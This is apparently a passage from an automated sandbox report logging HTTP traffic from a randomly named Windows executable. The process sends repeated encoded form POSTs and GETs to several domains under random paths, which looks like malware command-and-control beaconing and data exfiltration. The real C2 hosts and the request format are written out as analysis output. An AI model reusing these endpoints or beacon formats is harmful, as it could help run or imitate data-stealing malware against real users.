                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a9PI9ySeVFLyRUuPOyayVrhDxLGXfu28Dq7BgbBT9nfu/zcRR0OUJ/czCQatUEt/JiU+/ulpOPUEfThCF6JqXc93R18sD4m88BQusD2h9OsvWOfYYZNh6SvJoz31kpqNlCmck7cX1YJj7P5XGB3NAz8+wfN2Gzi9yIwiWb0qW1WAbI=
                                                                                  Sep 25, 2024 09:56:25.400648117 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:25 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Sep 25, 2024 09:56:25.400834084 CEST | 1246 | IN
                                                                                  Sep 25, 2024 09:56:25.401263952 CEST | 1289 | IN


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  24 | 192.168.11.20 | 49780 | 194.58.112.174 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:27.938630104 CEST | 2578 | OUT | POST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:27.938663006 CEST | 3867 | OUT
                                                                                  Sep 25, 2024 09:56:28.168648005 CEST | 1555 | OUT
                                                                                  Sep 25, 2024 09:56:28.173904896 CEST | 1289 | IN
                                                                                  Sep 25, 2024 09:56:28.174053907 CEST | 1246 | IN
                                                                                  Sep 25, 2024 09:56:28.174067020 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  25 | 192.168.11.20 | 49781 | 194.58.112.174 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:30.702748060 CEST | 553 | OUT | GET /7cy1/?Xb3xI=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:30.934695005 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:30 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.albero-dveri.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  26 | 192.168.11.20 | 49782 | 38.47.207.146 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:36.406135082 CEST | 801 | OUT | POST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
                                                                                  Sep 25, 2024 09:56:36.730251074 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:36 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  27 | 192.168.11.20 | 49783 | 38.47.207.146 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:39.255040884 CEST | 821 | OUT | POST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
                                                                                  Sep 25, 2024 09:56:39.585125923 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  28 | 192.168.11.20 | 49784 | 38.47.207.146 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:42.103002071 CEST | 1289 | OUT | POST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:42.430553913 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  29 | 192.168.11.20 | 49785 | 38.47.207.146 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:44.959815979 CEST | 543 | OUT | GET /qjs8/?Xb3xI=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:45.292587042 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:45 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  30 | 192.168.11.20 | 49786 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:50.861761093 CEST | 816 | OUT | POST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==


                                                                                  Session ID: 31 | Source IP: 192.168.11.20 | Source Port: 49787 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3276 | Process: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp: Sep 25, 2024 09:56:53.492954969 CEST | Bytes transferred: 836 | Direction: OUT
                                                                                  POST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=


                                                                                  Session ID: 32 | Source IP: 192.168.11.20 | Source Port: 49788 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3276 | Process: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp: Sep 25, 2024 09:56:56.132637024 CEST | Bytes transferred: 2578 | Direction: OUT
                                                                                  POST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI= [TRUNCATED]
                                                                                  Timestamp: Sep 25, 2024 09:56:56.132704020 CEST | Bytes transferred: 5407 | Direction: OUT
                                                                                  Data Ascii: Z7gQxkTW8U+yeYEZX69HiERESFWQ/R/yOjVnvUvv7t1ziWg2K9NFaJTJ233WDiHl4iJBNFMI8pbGxo+R7dKcdE9Jn+/0z/MgjDJ2BhkLZdpPGxLrSL+Tnj4xIMM6dLYF3EpIznJotHC+OJo/MlBSzJ6igaxM/7pi2wUNfg7MEjtZtFjI/0SZOcc3jZ8kyjD+GDqDuYqKmxrDASd2qsEGQ1rebqvbJyYbta3BiMj6ZfjxgMjEddX


                                                                                  Session ID: 33 | Source IP: 192.168.11.20 | Source Port: 49789 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3276 | Process: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp: Sep 25, 2024 09:56:58.770258904 CEST | Bytes transferred: 548 | Direction: OUT
                                                                                  GET /phvf/?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Timestamp: Sep 25, 2024 09:56:59.781140089 CEST | Bytes transferred: 398 | Direction: IN
                                                                                  HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:56:59 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0="}</script></head></html>


                                                                                  Session ID: 34 | Source IP: 192.168.11.20 | Source Port: 49790 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 3276 | Process: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp: Sep 25, 2024 09:57:05.367739916 CEST | Bytes transferred: 816 | Direction: OUT
                                                                                  POST /d84b/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dorikis.online
                                                                                  Origin: http://www.dorikis.online
                                                                                  Referer: http://www.dorikis.online/d84b/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=GBk3MDGQZQHC6hP4CImWDunyGq0MtLj5r49NIEvxY6+ppDJ7Ex20C9UUbqFvOvsBRTEQDdSEZFaBAMxq+YKMBCShgPoFjAFYGiPvYkMT0FzpyEXt9l1vHV4ycYsrPGONqhtwC7FP1Ayv6HeShq57Aa90zODgv8C5pQgQhe2c8N2/joFmCdhB0Qdqej8WwHTrZw==
                                                                                  Timestamp: Sep 25, 2024 09:57:05.688828945 CEST | Bytes transferred: 595 | Direction: IN
                                                                                  HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 25 Sep 2024 07:57:05 GMT
                                                                                  Server: Apache
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Content-Length: 389
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID: 35 | Source IP: 192.168.11.20 | Source Port: 49791 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 3276 | Process: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp: Sep 25, 2024 09:57:08.200606108 CEST | Bytes transferred: 836 | Direction: OUT
                                                                                  POST /d84b/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dorikis.online
                                                                                  Origin: http://www.dorikis.online
                                                                                  Referer: http://www.dorikis.online/d84b/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPOpnC57FzS0H9UUPaFmRfsaRT5tDfWEZFOBAI1q+pKNTiTH1foDtgFYGiPvYnw50FLpz1ntswVoL141bYsrLGOBqhsVC5xp1Cav6FGShb58Oa89/eDwicbVoTotwO3P6+qWm+U8fvVl3DBYaTF+yFSwE7+XOCxe+DhfScN8sdYSArI=
                                                                                  Timestamp: Sep 25, 2024 09:57:08.510865927 CEST | Bytes transferred: 595 | Direction: IN
                                                                                  HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 25 Sep 2024 07:57:08 GMT
                                                                                  Server: Apache
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Content-Length: 389
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID: 36 | Source IP: 192.168.11.20 | Source Port: 49792 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 3276 | Process: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp: Sep 25, 2024 09:57:11.020149946 CEST | Bytes transferred: 2578 | Direction: OUT
                                                                                  POST /d84b/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dorikis.online
                                                                                  Origin: http://www.dorikis.online
                                                                                  Referer: http://www.dorikis.online/d84b/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI= [TRUNCATED]
                                                                                  Timestamp: Sep 25, 2024 09:57:11.020195007 CEST | Bytes transferred: 5407 | Direction: OUT
                                                                                  Data Ascii: LDYDC5dKikiP/A+n3Jbr/mmbfU/N9ZvBn7rvZzIxYXDUa000MB865fAPpPuYOT989Iybx9Dn9pEU/xncM+b1rAc1eAW2pwzC+vtYeyL9iiH47zyd6AsXVWBbbsGJmeDvH/zTcFMFZPoYdhQhjo06/7ndBMkokyu3uZSkDecSuGA+LlZQlGw4NUZ9rQjFelS4vSfbhcRyrEa0N0LBSIcxC0B5GO8o2O6xZno0U/qj/pxyLOJ8m18
                                                                                  Timestamp: Sep 25, 2024 09:57:11.328962088 CEST | Bytes transferred: 595 | Direction: IN
                                                                                  HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 25 Sep 2024 07:57:11 GMT
                                                                                  Server: Apache
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Content-Length: 389
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID: 37 | Source IP: 192.168.11.20 | Source Port: 49793 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 3276 | Process: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp: Sep 25, 2024 09:57:13.851924896 CEST | Bytes transferred: 548 | Direction: OUT
                                                                                  GET /d84b/?Xb3xI=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dorikis.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Timestamp: Sep 25, 2024 09:57:14.183286905 CEST | Bytes transferred: 610 | Direction: IN
                                                                                  HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 25 Sep 2024 07:57:14 GMT
                                                                                  Server: Apache
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Content-Length: 389
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
